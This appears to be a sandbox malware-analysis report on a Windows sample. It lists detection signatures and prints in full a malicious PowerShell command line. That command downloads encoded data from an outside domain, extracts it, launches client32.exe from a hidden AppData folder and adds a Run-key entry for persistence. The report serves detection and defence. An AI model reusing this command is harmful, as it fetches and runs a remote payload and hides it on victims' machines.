Windows
Analysis Report
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe" -Ex Bypass -NoP -C $PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=[Sy
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 3200 cmdline:
C:\Windows \system32\ cmd.exe /c wget -t 2 -v -T 60 -P "C:\Use rs\user\De sktop\down load" --no -check-cer tificate - -content-d isposition --user-ag ent="Mozil la/5.0 (Wi ndows NT 6 .1; WOW64; Trident/7 .0; AS; rv :11.0) lik e Gecko" " http://C:/ Windows/Sy stem32/Win dowsPowerS hell/v1.0/ powershell .exe%22%20 -Ex%20Bypa ss%20-NoP% 20-C%20$PT BtYpeCFHyn kdkoevUtEl ='https:// edulokam.c om/data.ph p?14831';$ gopmqUMpEj zoPqVNEpYi XTOQjcWDaz gqQl=(New- Object%20S ystem.Net. WebClient) .DownloadS tring($PTB tYpeCFHynk dkoevUtEl) ;$arxPMyyn qrYXFJuXGW YmMP=%5BSy stem.Conve rt%5D::Fro mBase64Str ing($gopmq UMpEjzoPqV NEpYiXTOQj cWDazgqQl) ;$zxc%20=% 20Get-Rand om%20-Mini mum%20-10% 20-Maximum %2037;%20$ jSzJrBPlfP TuRAeEvyss vqzoqSuyxz kRy=%5BSys tem.Enviro nment%5D:: GetFolderP ath('Appli cationData ')+'%5CDIV X'+$zxc;if %20(!(Test -Path%20$j SzJrBPlfPT uRAeEvyssv qzoqSuyxzk Ry%20-Path Type%20Con tainer))%2 0%7B%20New -Item%20-P ath%20$jSz JrBPlfPTuR AeEvyssvqz oqSuyxzkRy %20-ItemTy pe%20Direc tory%20%7D ;$p=Join-P ath%20$jSz JrBPlfPTuR AeEvyssvqz oqSuyxzkRy %20'WWW.zi p';%5BSyst em.IO.File %5D::Write AllBytes($ p,$arxPMyy nqrYXFJuXG WYmMP);try %20%7B%20A dd-Type%20 -A%20Syste m.IO.Compr ession.Fil eSystem;%5 BSystem.IO .Compressi on.ZipFile %5D::Extra ctToDirect ory($p,$jS zJrBPlfPTu RAeEvyssvq zoqSuyxzkR y)%7D%20ca tch%20%7B% 20Write-Ho st%20'Fail ed:%20'%20 +%20$_;%20 exit%7D;$C V=Join-Pat h%20$jSzJr BPlfPTuRAe Evyssvqzoq SuyxzkRy%2 0'client32 .exe';if%2 0(Test-Pat h%20$CV%20 -PathType% 20Leaf)%20 %7B%20Star t-Process% 20-FilePat h%20$CV%7D %20else%20 %7B%20Writ e-Host%20' No%20exe.' %7D;$AZ=Ge t-Item%20$ jSzJrBPlfP TuRAeEvyss vqzoqSuyxz kRy%20-For ce;%20$AZ. attributes ='Hidden'; $s=$jSzJrB PlfPTuRAeE vyssvqzoqS uyxzkRy+'% 5Cclient32 .exe';$k=' HKCU:%5CSO FTWARE%5CM icrosoft%5 CWindows%5 CCurrentVe rsion%5CRu n';$v='OFF ICEC';$DS= 'String';N ew-ItemPro perty%20-P ath%20$k%2 0-Name%20$ v%20-Value %20$s%20-P ropertyTyp e%20$DS;" > cmdline. out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 728 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) wget.exe (PID: 5264 cmdline:
wget -t 2 -v -T 60 - P "C:\User s\user\Des ktop\downl oad" --no- check-cert ificate -- content-di sposition --user-age nt="Mozill a/5.0 (Win dows NT 6. 1; WOW64; Trident/7. 0; AS; rv: 11.0) like Gecko" "h ttp://C:/W indows/Sys tem32/Wind owsPowerSh ell/v1.0/p owershell. exe%22%20- Ex%20Bypas s%20-NoP%2 0-C%20$PTB tYpeCFHynk dkoevUtEl= 'https://e dulokam.co m/data.php ?14831';$g opmqUMpEjz oPqVNEpYiX TOQjcWDazg qQl=(New-O bject%20Sy stem.Net.W ebClient). DownloadSt ring($PTBt YpeCFHynkd koevUtEl); $arxPMyynq rYXFJuXGWY mMP=%5BSys tem.Conver t%5D::From Base64Stri ng($gopmqU MpEjzoPqVN EpYiXTOQjc WDazgqQl); $zxc%20=%2 0Get-Rando m%20-Minim um%20-10%2 0-Maximum% 2037;%20$j SzJrBPlfPT uRAeEvyssv qzoqSuyxzk Ry=%5BSyst em.Environ ment%5D::G etFolderPa th('Applic ationData' )+'%5CDIVX '+$zxc;if% 20(!(Test- Path%20$jS zJrBPlfPTu RAeEvyssvq zoqSuyxzkR y%20-PathT ype%20Cont ainer))%20 %7B%20New- Item%20-Pa th%20$jSzJ rBPlfPTuRA eEvyssvqzo qSuyxzkRy% 20-ItemTyp e%20Direct ory%20%7D; $p=Join-Pa th%20$jSzJ rBPlfPTuRA eEvyssvqzo qSuyxzkRy% 20'WWW.zip ';%5BSyste m.IO.File% 5D::WriteA llBytes($p ,$arxPMyyn qrYXFJuXGW YmMP);try% 20%7B%20Ad d-Type%20- A%20System .IO.Compre ssion.File System;%5B System.IO. Compressio n.ZipFile% 5D::Extrac tToDirecto ry($p,$jSz JrBPlfPTuR AeEvyssvqz oqSuyxzkRy )%7D%20cat ch%20%7B%2 0Write-Hos t%20'Faile d:%20'%20+ %20$_;%20e xit%7D;$CV =Join-Path %20$jSzJrB PlfPTuRAeE vyssvqzoqS uyxzkRy%20 'client32. exe';if%20 (Test-Path %20$CV%20- PathType%2 0Leaf)%20% 7B%20Start -Process%2 0-FilePath %20$CV%7D% 20else%20% 7B%20Write -Host%20'N o%20exe.'% 7D;$AZ=Get -Item%20$j SzJrBPlfPT uRAeEvyssv qzoqSuyxzk Ry%20-Forc e;%20$AZ.a ttributes= 'Hidden';$ s=$jSzJrBP lfPTuRAeEv yssvqzoqSu yxzkRy+'%5 Cclient32. exe';$k='H KCU:%5CSOF TWARE%5CMi crosoft%5C Windows%5C CurrentVer sion%5CRun ';$v='OFFI CEC';$DS=' String';Ne w-ItemProp erty%20-Pa th%20$k%20 -Name%20$v %20-Value% 20$s%20-Pr opertyType %20$DS;" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |